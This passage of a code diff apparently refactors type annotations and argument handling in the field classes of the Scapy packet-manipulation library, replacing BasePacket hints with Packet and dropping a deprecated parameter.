(Optional[Packet], bytes) -> str return bytes_encode(x).decode('utf-16') @@ -1309,7 +1315,7 @@ class _PacketField(_StrField[K]): def __init__(self, name, # type: str default, # type: Optional[K] - pkt_cls, # type: Union[Callable[[bytes], BasePacket], Packet_metaclass] # noqa: E501 + pkt_cls, # type: Union[Callable[[bytes], Packet], Type[Packet]] # noqa: E501 remain=0, # type: int ): # type: (...) -> None @@ -1317,7 +1323,7 @@ def __init__(self, self.cls = pkt_cls def i2m(self, - pkt, # type: BasePacket + pkt, # type: Optional[Packet] i, # type: Any ): # type: (...) -> bytes @@ -1326,11 +1332,11 @@ def i2m(self, return raw(i) def m2i(self, pkt, m): - # type: (Optional[BasePacket], bytes) -> BasePacket + # type: (Optional[Packet], bytes) -> Packet return self.cls(m) def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, K] @@ -1357,19 +1363,19 @@ class PacketLenField(PacketField): def __init__(self, name, # type: str - default, # type: BasePacket - cls, # type: Union[Callable[[bytes], BasePacket], Packet_metaclass] # noqa: E501 - length_from=None # type: Optional[Callable[[BasePacket], int]] # noqa: E501 + default, # type: Packet + cls, # type: Union[Callable[[bytes], Packet], Type[Packet]] # noqa: E501 + length_from=None # type: Optional[Callable[[Packet], int]] # noqa: E501 ): # type: (...) -> None - PacketField.__init__(self, name, default, cls) + super(PacketLenField, self).__init__(name, default, cls) self.length_from = length_from or (lambda x: 0) def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): - # type: (...) -> Tuple[bytes, BasePacket] + # type: (...) -> Tuple[bytes, Packet] len_pkt = self.length_from(pkt) try: i = self.m2i(pkt, s[:len_pkt]) @@ -1394,10 +1400,10 @@ def __init__( self, name, # type: str default, # type: Optional[List[BasePacket]] - pkt_cls=None, # type: Optional[Union[Callable[[bytes], BasePacket], Packet_metaclass]] # noqa: E501 - count_from=None, # type: Optional[Callable[[BasePacket], int]] - length_from=None, # type: Optional[Callable[[BasePacket], int]] - next_cls_cb=None, # type: Optional[Callable[[BasePacket, List[BasePacket], Optional[BasePacket], bytes], Packet_metaclass]] # noqa: E501 + pkt_cls=None, # type: Optional[Union[Callable[[bytes], Packet], Type[Packet]]] # noqa: E501 + count_from=None, # type: Optional[Callable[[Packet], int]] + length_from=None, # type: Optional[Callable[[Packet], int]] + next_cls_cb=None, # type: Optional[Callable[[Packet, List[BasePacket], Optional[Packet], bytes], Type[Packet]]] # noqa: E501 ): # type: (...) -> None """ @@ -1407,12 +1413,12 @@ def __init__( * count_from: a callback that returns the number of Packet instances to dissect. The callback prototype is:: - count_from(pkt:BasePacket) -> int + count_from(pkt:Packet) -> int * length_from: a callback that returns the number of bytes that must be dissected by this field. The callback prototype is:: - length_from(pkt:BasePacket) -> int + length_from(pkt:Packet) -> int * next_cls_cb: a callback that enables a Scapy developer to dynamically discover if another Packet instance should be @@ -1441,9 +1447,9 @@ def __init__( following prototype:: dispatch_hook(cls, - _pkt:Optional[BasePacket], + _pkt:Optional[Packet], *args, **kargs - ) -> Packet_metaclass + ) -> Type[Packet] The _pkt parameter may contain a reference to the packet instance containing the PacketListField that is being @@ -1456,7 +1462,7 @@ def __init__( lst:List[Packet], cur:Optional[Packet], remain:str - ) -> Optional[Packet_metaclass] + ) -> Optional[Type[Packet]] The pkt argument contains a reference to the Packet instance containing the PacketListField that is being dissected. @@ -1464,7 +1470,7 @@ def __init__( previously parsed during the current ``PacketListField`` dissection, saved for the very last Packet instance. The cur argument contains a reference to that very last parsed - ``BasePacket`` instance. The remain argument contains the bytes + ``Packet`` instance. The remain argument contains the bytes that may still be consumed by the current PacketListField dissection operation. @@ -1500,20 +1506,24 @@ class object defining a ``dispatch_hook`` class method """ if default is None: default = [] # Create a new list for each instance - super(PacketListField, self).__init__(name, default, pkt_cls) + super(PacketListField, self).__init__( + name, + default, + pkt_cls # type: ignore + ) self.count_from = count_from self.length_from = length_from self.next_cls_cb = next_cls_cb def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> List[BasePacket] + # type: (Optional[Packet], Any) -> List[BasePacket] if not isinstance(x, list): return [x] else: return x def i2count(self, - pkt, # type: BasePacket + pkt, # type: Optional[Packet] val, # type: List[BasePacket] ): # type: (...) -> int @@ -1522,14 +1532,14 @@ def i2count(self, return 1 def i2len(self, - pkt, # type: BasePacket - val, # type: List[BasePacket] + pkt, # type: Optional[Packet] + val, # type: List[Packet] ): # type: (...) -> int return sum(len(p) for p in val) def getfield(self, pkt, s): - # type: (Optional[BasePacket], bytes) -> Tuple[bytes, List[BasePacket]] + # type: (Packet, bytes) -> Tuple[bytes, List[BasePacket]] c = len_pkt = cls = None if self.length_from is not None: len_pkt = self.length_from(pkt) @@ -1541,7 +1551,7 @@ def getfield(self, pkt, s): if cls is None: c = 0 - lst = [] # type: BasePacket + lst = [] # type: List[BasePacket] ret = b"" remain = s if len_pkt is not None: @@ -1577,7 +1587,7 @@ def getfield(self, pkt, s): return remain + ret, lst def addfield(self, pkt, s, val): - # type: (Optional[BasePacket], bytes, Any) -> bytes + # type: (Packet, bytes, Any) -> bytes return s + b"".join(bytes_encode(v) for v in val) @@ -1589,7 +1599,7 @@ def __init__( name, # type: str default, # type: bytes length=None, # type: Optional[int] - length_from=None, # type: Optional[Callable[[BasePacket], int]] + length_from=None, # type: Optional[Callable[[Optional[Packet]], int]] # noqa: E501 ): # type: (...) -> None super(StrFixedLenField, self).__init__(name, default) @@ -1598,7 +1608,7 @@ def __init__( self.length_from = lambda x, length=length: length # type: ignore def i2repr(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] v, # type: bytes ): # type: (...) -> str @@ -1607,12 +1617,12 @@ def i2repr(self, return super(StrFixedLenField, self).i2repr(pkt, v) def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, bytes] + # type: (Packet, bytes) -> Tuple[bytes, bytes] len_pkt = self.length_from(pkt) return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[bytes]) -> bytes + # type: (Packet, bytes, Optional[bytes]) -> bytes len_pkt = self.length_from(pkt) if len_pkt is None: return s + self.i2m(pkt, val) @@ -1636,14 +1646,14 @@ def __init__( default, # type: bytes length=None, # type: Optional[int] enum=None, # type: Optional[Dict[str, str]] - length_from=None # type: Optional[Callable[[BasePacket], int]] + length_from=None # type: Optional[Callable[[Optional[Packet]], int]] # noqa: E501 ): # type: (...) -> None StrFixedLenField.__init__(self, name, default, length=length, length_from=length_from) # noqa: E501 self.enum = enum def i2repr(self, pkt, w): - # type: (BasePacket, bytes) -> str + # type: (Optional[Packet], bytes) -> str v = plain_str(w) r = v.rstrip("\0") rr = repr(r) @@ -1661,8 +1671,11 @@ def __init__(self, name, default, length=31): StrFixedLenField.__init__(self, name, default, length) def i2m(self, pkt, y): - # type: (Optional[BasePacket], Optional[bytes]) -> bytes - len_pkt = self.length_from(pkt) // 2 + # type: (Optional[Packet], Optional[bytes]) -> bytes + if pkt: + len_pkt = self.length_from(pkt) // 2 + else: + len_pkt = 0 x = bytes_encode(y or b"") # type: bytes x += b" " * len_pkt x = x[:len_pkt] @@ -1674,7 +1687,7 @@ def i2m(self, pkt, y): return b" " + x def m2i(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> bytes + # type: (Optional[Packet], bytes) -> bytes x = x.strip(b"\x00").strip(b" ") return b"".join(map( lambda x, y: chb( @@ -1691,8 +1704,7 @@ def __init__( self, name, # type: str default, # type: bytes - fld=None, # type: Optional[str] - length_from=None, # type: Optional[Callable[[BasePacket], int]] + length_from=None, # type: Optional[Callable[[Packet], int]] max_length=None, # type: Optional[Any] ): # type: (...) -> None @@ -1716,7 +1728,7 @@ class XStrField(StrField): """ def i2repr(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str if x is None: return repr(x) return bytes_hex(x).decode() @@ -1724,7 +1736,7 @@ def i2repr(self, pkt, x): class _XStrLenField: def i2repr(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str if not x: return repr(x) return bytes_hex( @@ -1746,33 +1758,33 @@ class XStrFixedLenField(_XStrLenField, StrFixedLenField): class XLEStrLenField(XStrLenField): def i2m(self, pkt, x): - # type: (BasePacket, Optional[bytes]) -> bytes + # type: (Optional[Packet], Optional[bytes]) -> bytes if not x: return b"" return x[:: -1] def m2i(self, pkt, x): - # type: (BasePacket, bytes) -> bytes + # type: (Optional[Packet], bytes) -> bytes return x[:: -1] class StrLenFieldUtf16(StrLenField): def h2i(self, pkt, x): - # type: (Optional[BasePacket], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[str]) -> bytes return plain_str(x).encode('utf-16')[2:] def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> bytes + # type: (Optional[Packet], Any) -> bytes if isinstance(x, six.text_type): return self.h2i(pkt, x) return super(StrLenFieldUtf16, self).any2i(pkt, x) def i2repr(self, pkt, x): - # type: (Optional[BasePacket], bytes) -> str + # type: (Optional[Packet], bytes) -> str return plain_str(x) def i2h(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x, # type: bytes ): # type: (...) -> str @@ -1788,11 +1800,10 @@ def __init__( default, # type: bytes minlen=0, # type: int maxlen=255, # type: int - fld=None, # type: Optional[Field_metaclass] - length_from=None # type: Optional[Callable[[BasePacket], int]] + length_from=None # type: Optional[Callable[[Packet], int]] ): # type: (...) -> None - StrLenField.__init__(self, name, default, fld, length_from) + StrLenField.__init__(self, name, default, length_from=length_from) self.minlen = minlen self.maxlen = maxlen @@ -1809,9 +1820,9 @@ def __init__( self, name, # type: str default, # type: Optional[List[Field[Any, Any]]] - field, # type: Field_metaclass - length_from=None, # type: Optional[Callable[[BasePacket], int]] - count_from=None, # type: Optional[Callable[[BasePacket], int]] + field, # type: Field[Any, Any] + length_from=None, # type: Optional[Callable[[Packet], int]] + count_from=None, # type: Optional[Callable[[Packet], int]] ): # type: (...) -> None if default is None: @@ -1822,31 +1833,31 @@ def __init__( self.length_from = length_from def i2count(self, pkt, val): - # type: (BasePacket, List[Any]) -> int + # type: (Optional[Packet], List[Any]) -> int if isinstance(val, list): return len(val) return 1 def i2len(self, pkt, val): - # type: (BasePacket, List[Any]) -> int + # type: (Packet, List[Any]) -> int return int(sum(self.field.i2len(pkt, v) for v in val)) def any2i(self, pkt, x): - # type: (BasePacket, List[Any]) -> List[Any] + # type: (Optional[Packet], List[Any]) -> List[Any] if not isinstance(x, list): return [self.field.any2i(pkt, x)] else: return [self.field.any2i(pkt, e) for e in x] def i2repr(self, - pkt, # type: BasePacket + pkt, # type: Optional[Packet] x, # type: List[Any] ): # type: (...) -> str return "[%s]" % ", ".join(self.field.i2repr(pkt, v) for v in x) def addfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes val, # type: Optional[List[Any]] ): @@ -1857,7 +1868,7 @@ def addfield(self, return s def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): # type: (...) -> Any @@ -1892,38 +1903,40 @@ def __init__( length_of=None, # type: Optional[str] fmt="H", # type: str count_of=None, # type: Optional[str] - adjust=lambda pkt, x: x, # type: Callable[[BasePacket, int], int] - fld=None, # type: Optional[Any] + adjust=lambda pkt, x: x, # type: Callable[[Packet, int], int] ): # type: (...) -> None Field.__init__(self, name, default, fmt) self.length_of = length_of self.count_of = count_of self.adjust = adjust - if fld is not None: - # FIELD_LENGTH_MANAGEMENT_DEPRECATION(self.__class__.__name__) - self.length_of = fld def i2m(self, pkt, x): - # type: (BasePacket, Optional[int]) -> int - if x is None: + # type: (Optional[Packet], Optional[int]) -> int + if x is None and pkt is not None: if self.length_of is not None: fld, fval = pkt.getfield_and_val(self.length_of) f = fld.i2len(pkt, fval) - else: + elif self.count_of is not None: fld, fval = pkt.getfield_and_val(self.count_of) f = fld.i2count(pkt, fval) + else: + raise ValueError( + "Field should have either length_of or count_of" + ) x = self.adjust(pkt, f) + elif x is None: + x = 0 return x class StrNullField(StrField): def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[bytes]) -> bytes + # type: (Packet, bytes, Optional[bytes]) -> bytes return s + self.i2m(pkt, val) + b"\x00" def getfield(self, - pkt, # type: BasePacket + pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, bytes] @@ -1948,7 +1961,7 @@ def __init__(self, name, default, stop, additional=0): self.additional = additional def getfield(self, pkt, s): - # type: (Optional[BasePacket], bytes) -> Tuple[bytes, bytes] + # type: (Optional[Packet], bytes) -> Tuple[bytes, bytes] len_str = s.find(self.stop) if len_str < 0: return b"", s @@ -1973,24 +1986,26 @@ def __init__(self, name, default, fmt="H", adjust=lambda x: x): self.adjust = adjust def i2m(self, - pkt, # type: BasePacket + pkt, # type: Optional[Packet] x, # type: Optional[int] ): # type: (...) -> int if x is None: - x = self.adjust(len(pkt.payload)) + x = 0 + if pkt is not None: + x = self.adjust(len(pkt.payload)) return x class BCDFloatField(Field[float, int]): def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[float]) -> int + # type: (Optional[Packet], Optional[float]) -> int if x is None: return 0 return int(256 * x) def m2i(self, pkt, x): - # type: (Optional[BasePacket], int) -> float + # type: (Optional[Packet], int) -> float return x / 256.0 @@ -2061,7 +2076,7 @@ def __init__(self, name, default, size, # We need to # type: ignore a few things because of how special # BitField is def addfield(self, # type: ignore - pkt, # type: BasePacket + pkt, # type: Packet s, # type: Union[Tuple[bytes, int, int], bytes] ival, # type: I ): @@ -2088,7 +2103,7 @@ def addfield(self, # type: ignore return s def getfield(self, # type: ignore - pkt, # type: BasePacket + pkt, # type: Packet s, # type: Union[Tuple[bytes, int], bytes] ): # type: (...) -> Union[Tuple[Tuple[bytes, int], I], Tuple[bytes, I]] # noqa: E501 @@ -2131,7 +2146,7 @@ def randval(self): return RandNum(0, 2**self.size - 1) def i2len(self, pkt, x): # type: ignore - # type: (Optional[BasePacket], Optional[float]) -> float + # type: (Optional[Packet], Optional[float]) -> float return float(self.size) / 8 @@ -2145,14 +2160,14 @@ class BitFixedLenField(BitField): def __init__(self, name, # type: str default, # type: int - length_from # type: Callable[[BasePacket], int] + length_from # type: Callable[[Packet], int] ): # type: (...) -> None self.length_from = length_from super(BitFixedLenField, self).__init__(name, default, 0) def getfield(self, # type: ignore - pkt, # type: BasePacket + pkt, # type: Packet s, # type: Union[Tuple[bytes, int], bytes] ): # type: (...) -> Union[Tuple[Tuple[bytes, int], int], Tuple[bytes, int]] # noqa: E501 @@ -2160,7 +2175,7 @@ def getfield(self, # type: ignore return super(BitFixedLenField, self).getfield(pkt, s) def addfield(self, # type: ignore - pkt, # type: BasePacket + pkt, # type: Packet s, # type: Union[Tuple[bytes, int, int], bytes] val # type: int ): @@ -2176,9 +2191,9 @@ def __init__(self, name, # type: str default, # type: int size, # type: int - length_of=None, # type: Optional[Union[Callable[[Optional[BasePacket]], int], str]] # noqa: E501 + length_of=None, # type: Optional[Union[Callable[[Optional[Packet]], int], str]] # noqa: E501 count_of=None, # type: Optional[str] - adjust=lambda pkt, x: x, # type: Callable[[Optional[BasePacket], int], int] # noqa: E501 + adjust=lambda pkt, x: x, # type: Callable[[Optional[Packet], int], int] # noqa: E501 ): # type: (...) -> None super(BitFieldLenField, self).__init__(name, default, size) @@ -2187,7 +2202,7 @@ def __init__(self, self.adjust = adjust def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[Any]) -> int + # type: (Optional[Packet], Optional[Any]) -> int if six.PY2: func = FieldLenField.i2m.__func__ else: @@ -2197,7 +2212,7 @@ def i2m(self, pkt, x): class XBitField(BitField): def i2repr(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return lhex(self.i2h(pkt, x)) @@ -2251,7 +2266,7 @@ def __init__(self, Field.__init__(self, name, default, fmt) def any2i_one(self, pkt, x): - # type: (Optional[BasePacket], Any) -> I + # type: (Optional[Packet], Any) -> I if isinstance(x, str): if self.s2i: try: @@ -2263,7 +2278,7 @@ def any2i_one(self, pkt, x): return cast(I, x) def i2repr_one(self, pkt, x): - # type: (Optional[BasePacket], I) -> str + # type: (Optional[Packet], I) -> str if self not in conf.noenum and not isinstance(x, VolatileValue): if self.i2s: try: @@ -2277,14 +2292,14 @@ def i2repr_one(self, pkt, x): return repr(x) def any2i(self, pkt, x): - # type: (BasePacket, Any) -> Union[I, List[I]] + # type: (Optional[Packet], Any) -> Union[I, List[I]] if isinstance(x, list): return [self.any2i_one(pkt, z) for z in x] else: return self.any2i_one(pkt, x) def i2repr(self, pkt, x): # type: ignore - # type: (Optional[BasePacket], Any) -> Union[List[str], str] + # type: (Optional[Packet], Any) -> Union[List[str], str] if isinstance(x, list): return [self.i2repr_one(pkt, z) for z in x] else: @@ -2329,7 +2344,7 @@ def __init__(self, self.i2s, self.s2i = self.s2i, self.i2s def any2i_one(self, pkt, x): - # type: (Optional[BasePacket], str) -> str + # type: (Optional[Packet], str) -> str if len(x) != 1: if self.s2i: x = self.s2i[x] @@ -2349,11 +2364,11 @@ def __init__(self, name, default, size, enum): self.sz = self.size / 8. # type: ignore def any2i(self, pkt, x): - # type: (BasePacket, Any) -> Union[List[int], int] + # type: (Optional[Packet], Any) -> Union[List[int], int] return _EnumField.any2i(self, pkt, x) def i2repr(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x, # type: Union[List[int], int] ): # type: (...) -> Any @@ -2386,7 +2401,7 @@ def __init__(self, name, default, enum): class XByteEnumField(ByteEnumField): def i2repr_one(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str if self not in conf.noenum and not isinstance(x, VolatileValue): if self.i2s: try: @@ -2420,7 +2435,7 @@ def __init__(self, name, default, enum): class XShortEnumField(ShortEnumField): def i2repr_one(self, pkt, x): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str if self not in conf.noenum and not isinstance(x, VolatileValue): if self.i2s is not None: try: @@ -2439,7 +2454,7 @@ def __init__(self, name, # type: str default, # type: int enum, # type: Dict[I, Dict[I, str]] - depends_on, # type: Callable[[BasePacket], I] + depends_on, # type: Callable[[Optional[Packet]], I] fmt="H" # type: str ): # type: (...) -> None @@ -2457,7 +2472,7 @@ def __init__(self, Field.__init__(self, name, default, fmt) def any2i_one(self, pkt, x): - # type: (BasePacket, Any) -> I + # type: (Optional[Packet], Any) -> I if isinstance(x, str): v = self.depends_on(pkt) if v in self.s2i_multi: @@ -2468,7 +2483,7 @@ def any2i_one(self, pkt, x): return cast(I, x) def i2repr_one(self, pkt, x): - # type: (BasePacket, I) -> str + # type: (Optional[Packet], I) -> str v = self.depends_on(pkt) if isinstance(v, VolatileValue): return repr(v) @@ -2491,7 +2506,7 @@ def __init__( default, # type: int size, # type: int enum, # type: Dict[int, Dict[int, str]] - depends_on # type: Callable[[BasePacket], int] + depends_on # type: Callable[[Optional[Packet]], int] ): # type: (...) -> None _MultiEnumField.__init__(self, name, default, enum, depends_on) @@ -2500,12 +2515,12 @@ def __init__( self.sz = self.size / 8. # type: ignore def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Union[List[int], int] + # type: (Optional[Packet], Any) -> Union[List[int], int] return _MultiEnumField.any2i(self, pkt, x) def i2repr( # type: ignore self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x # type: Union[List[int], int] ): # type: (...) -> Union[str, List[str]] @@ -2547,11 +2562,16 @@ def __init__( length_of=None, # type: Optional[str] fmt=" None - FieldLenField.__init__(self, name, default, length_of=length_of, fmt=fmt, count_of=count_of, fld=fld, adjust=adjust) # noqa: E501 + FieldLenField.__init__( + self, name, default, + length_of=length_of, + fmt=fmt, + count_of=count_of, + adjust=adjust + ) class FlagValueIter(object): @@ -2737,7 +2757,7 @@ class FlagsField(_BitField[Optional[Union[int, FlagValue]]]): Example (list): >>> from scapy.packet import Packet - >>> class FlagsTest(BasePacket): + >>> class FlagsTest(Packet): fields_desc = [FlagsField("flags", 0, 8, ["f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7"])] # noqa: E501 >>> FlagsTest(flags=9).show2() ###[ FlagsTest ]### @@ -2805,19 +2825,19 @@ def _fixup_val(self, x): return FlagValue(x, self.names) def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Optional[FlagValue] + # type: (Optional[Packet], Any) -> Optional[FlagValue] return self._fixup_val(super(FlagsField, self).any2i(pkt, x)) def m2i(self, pkt, x): - # type: (Optional[BasePacket], int) -> Optional[FlagValue] + # type: (Optional[Packet], int) -> Optional[FlagValue] return self._fixup_val(super(FlagsField, self).m2i(pkt, x)) def i2h(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Optional[FlagValue] + # type: (Optional[Packet], Any) -> Optional[FlagValue] return self._fixup_val(super(FlagsField, self).i2h(pkt, x)) def i2repr(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x, # type: Any ): # type: (...) -> str @@ -2839,7 +2859,7 @@ def __init__(self, default, # type: Set[str] size, # type: int names, # type: Dict[int, Dict[int, MultiFlagsEntry]] - depends_on, # type: Callable[[BasePacket], int] + depends_on, # type: Callable[[Optional[Packet]], int] ): # type: (...) -> None self.names = names @@ -2847,7 +2867,7 @@ def __init__(self, super(MultiFlagsField, self).__init__(name, default, size) def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Set[str] + # type: (Optional[Packet], Any) -> Set[str] if not isinstance(x, (set, int)): raise ValueError('set expected') @@ -2874,7 +2894,7 @@ def any2i(self, pkt, x): return x def i2m(self, pkt, x): - # type: (BasePacket, Optional[Set[str]]) -> int + # type: (Optional[Packet], Optional[Set[str]]) -> int v = self.depends_on(pkt) these_names = self.names.get(v, {}) @@ -2891,7 +2911,7 @@ def i2m(self, pkt, x): return r def m2i(self, pkt, x): - # type: (BasePacket, int) -> Set[str] + # type: (Optional[Packet], int) -> Set[str] v = self.depends_on(pkt) these_names = self.names.get(v, {}) @@ -2908,7 +2928,7 @@ def m2i(self, pkt, x): return r def i2repr(self, pkt, x): - # type: (BasePacket, Set[str]) -> str + # type: (Optional[Packet], Set[str]) -> str v = self.depends_on(pkt) these_names = self.names.get(v, {}) @@ -2932,7 +2952,7 @@ def __init__(self, name, default, size, frac_bits=16): super(FixedPointField, self).__init__(name, default, size) def any2i(self, pkt, val): - # type: (Optional[BasePacket], Optional[float]) -> Optional[int] + # type: (Optional[Packet], Optional[float]) -> Optional[int] if val is None: return val ival = int(val) @@ -2940,14 +2960,14 @@ def any2i(self, pkt, val): return (ival << self.frac_bits) | fract def i2h(self, pkt, val): - # type: (Optional[BasePacket], int) -> float + # type: (Optional[Packet], int) -> float int_part = val >> self.frac_bits frac_part = float(val & (1 << self.frac_bits) - 1) frac_part /= 2.0**self.frac_bits return int_part + frac_part def i2repr(self, pkt, val): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str return str(self.i2h(pkt, val)) @@ -2964,7 +2984,7 @@ def __init__( maxbytes, # type: int aton, # type: Callable[..., Any] ntoa, # type: Callable[..., Any] - length_from=None # type: Optional[Callable[[BasePacket], int]] + length_from=None # type: Optional[Callable[[Packet], int]] ): # type: (...) -> None self.wordbytes = wordbytes @@ -2982,20 +3002,23 @@ def _numbytes(self, pfxlen): return ((pfxlen + (wbits - 1)) // wbits) * self.wordbytes def h2i(self, pkt, x): - # type: (BasePacket, str) -> Tuple[str, int] + # type: (Optional[Packet], str) -> Tuple[str, int] # "fc00:1::1/64" -> ("fc00:1::1", 64) [pfx, pfxlen] = x.split('/') self.aton(pfx) # check for validity return (pfx, int(pfxlen)) def i2h(self, pkt, x): - # type: (BasePacket, Tuple[str, int]) -> str + # type: (Optional[Packet], Tuple[str, int]) -> str # ("fc00:1::1", 64) -> "fc00:1::1/64" (pfx, pfxlen) = x return "%s/%i" % (pfx, pfxlen) - def i2m(self, pkt, x): - # type: (BasePacket, Optional[Tuple[str, int]]) -> Tuple[bytes, int] + def i2m(self, + pkt, # type: Optional[Packet] + x # type: Optional[Tuple[str, int]] + ): + # type: (...) -> Tuple[bytes, int] # ("fc00:1::1", 64) -> (b"\xfc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01", 64) # noqa: E501 if x is None: pfx, pfxlen = "", 0 @@ -3005,7 +3028,7 @@ def i2m(self, pkt, x): return (s[:self._numbytes(pfxlen)], pfxlen) def m2i(self, pkt, x): - # type: (BasePacket, Tuple[bytes, int]) -> Tuple[str, int] + # type: (Optional[Packet], Tuple[bytes, int]) -> Tuple[str, int] # (b"\xfc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01", 64) -> ("fc00:1::1", 64) # noqa: E501 (s, pfxlen) = x @@ -3014,25 +3037,25 @@ def m2i(self, pkt, x): return (self.ntoa(s), pfxlen) def any2i(self, pkt, x): - # type: (BasePacket, Optional[Any]) -> Tuple[str, int] + # type: (Optional[Packet], Optional[Any]) -> Tuple[str, int] if x is None: return (self.ntoa(b"\0" * self.maxbytes), 1) return self.h2i(pkt, x) def i2len(self, pkt, x): - # type: (BasePacket, Tuple[str, int]) -> int + # type: (Packet, Tuple[str, int]) -> int (_, pfxlen) = x return pfxlen def addfield(self, pkt, s, val): - # type: (BasePacket, bytes, Optional[Tuple[str, int]]) -> bytes + # type: (Packet, bytes, Optional[Tuple[str, int]]) -> bytes (rawpfx, pfxlen) = self.i2m(pkt, val) fmt = "!%is" % self._numbytes(pfxlen) return s + struct.pack(fmt, rawpfx) def getfield(self, pkt, s): - # type: (BasePacket, bytes) -> Tuple[bytes, Tuple[str, int]] + # type: (Packet, bytes) -> Tuple[bytes, Tuple[str, int]] pfxlen = self.length_from(pkt) numbytes = self._numbytes(pfxlen) fmt = "!%is" % numbytes @@ -3045,7 +3068,7 @@ def __init__( name, # type: str default, # type: Tuple[str, int] wordbytes=1, # type: int - length_from=None # type: Optional[Callable[[BasePacket], int]] + length_from=None # type: Optional[Callable[[Packet], int]] ): _IPPrefixFieldBase.__init__( self, @@ -3065,7 +3088,7 @@ def __init__( name, # type: str default, # type: Tuple[str, int] wordbytes=1, # type: int - length_from=None # type: Optional[Callable[[BasePacket], int]] + length_from=None # type: Optional[Callable[[Packet], int]] ): # type: (...) -> None _IPPrefixFieldBase.__init__( @@ -3106,7 +3129,7 @@ def __init__(self, self.use_nano = use_nano def i2repr(self, pkt, x): - # type: (BasePacket, float) -> str + # type: (Optional[Packet], float) -> str if x is None: x = 0 elif self.use_msec: @@ -3120,7 +3143,7 @@ def i2repr(self, pkt, x): return "%s (%d)" % (t, x) def i2m(self, pkt, x): - # type: (BasePacket, Optional[float]) -> int + # type: (Optional[Packet], Optional[float]) -> int return int(x) if x is not None else 0 @@ -3140,7 +3163,7 @@ def __init__(self, name, default, self.use_nano = use_nano def i2repr(self, pkt, x): - # type: (Optional[BasePacket], Optional[float]) -> str + # type: (Optional[Packet], Optional[float]) -> str if x is None: y = 0 # type: Union[int, float] elif self.use_msec: @@ -3172,7 +3195,7 @@ def __init__(self, Field.__init__(self, name, default, fmt) # type: ignore def i2m(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x # type: Optional[Union[int, float]] ): # type: (...) -> Union[int, float] @@ -3184,14 +3207,14 @@ def i2m(self, return x def m2i(self, pkt, x): - # type: (Optional[BasePacket], Union[int, float]) -> Union[int, float] + # type: (Optional[Packet], Union[int, float]) -> Union[int, float] x = x * self.scaling + self.offset if isinstance(x, float) and self.fmt[-1] != "f": # type: ignore x = round(x, self.ndigits) return x def any2i(self, pkt, x): - # type: (Optional[BasePacket], Any) -> Union[int, float] + # type: (Optional[Packet], Any) -> Union[int, float] if isinstance(x, (str, bytes)): x = struct.unpack(self.fmt, bytes_encode(x))[0] # type: ignore x = self.m2i(pkt, x) @@ -3200,7 +3223,7 @@ def any2i(self, pkt, x): return x def i2repr(self, pkt, x): - # type: (Optional[BasePacket], Union[int, float]) -> str + # type: (Optional[Packet], Union[int, float]) -> str return "%s %s" % ( self.i2h(pkt, x), # type: ignore self.unit @@ -3224,7 +3247,7 @@ class ScalingField(_ScalingField, Example: >>> from scapy.packet import Packet - >>> class ScalingFieldTest(BasePacket): + >>> class ScalingFieldTest(Packet): fields_desc = [ScalingField('data', 0, scaling=0.1, offset=-1, unit='mV')] # noqa: E501 >>> ScalingFieldTest(data=10).show2() ###[ ScalingFieldTest ]### @@ -3276,7 +3299,7 @@ class OUIField(X3BytesField): A field designed to carry a OUI (3 bytes) """ def i2repr(self, pkt, val): - # type: (Optional[BasePacket], int) -> str + # type: (Optional[Packet], int) -> str by_val = struct.pack("!I", val or 0)[1:] oui = str2mac(by_val + b"\0" * 3)[:8] if conf.manufdb: @@ -3363,7 +3386,7 @@ def _check_uuid_fmt(self): "Unsupported uuid_fmt ({})".format(self.uuid_fmt)) def i2m(self, pkt, x): - # type: (Optional[BasePacket], Optional[UUID]) -> bytes + # type: (Optional[Packet], Optional[UUID]) -> bytes self._check_uuid_fmt() if x is None: return b'\0' * 16 @@ -3377,7 +3400,7 @@ def i2m(self, pkt, x): raise FieldAttributeException("Unknown fmt") def m2i(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x, # type: bytes ): # type: (...) -> UUID @@ -3392,7 +3415,7 @@ def m2i(self, raise FieldAttributeException("Unknown fmt") def any2i(self, - pkt, # type: Optional[BasePacket] + pkt, # type: Optional[Packet] x # type: Any # noqa: E501 ): # type: (...) -> Optional[UUID] @@ -3539,7 +3562,7 @@ def m2i(self, pkt, x): return 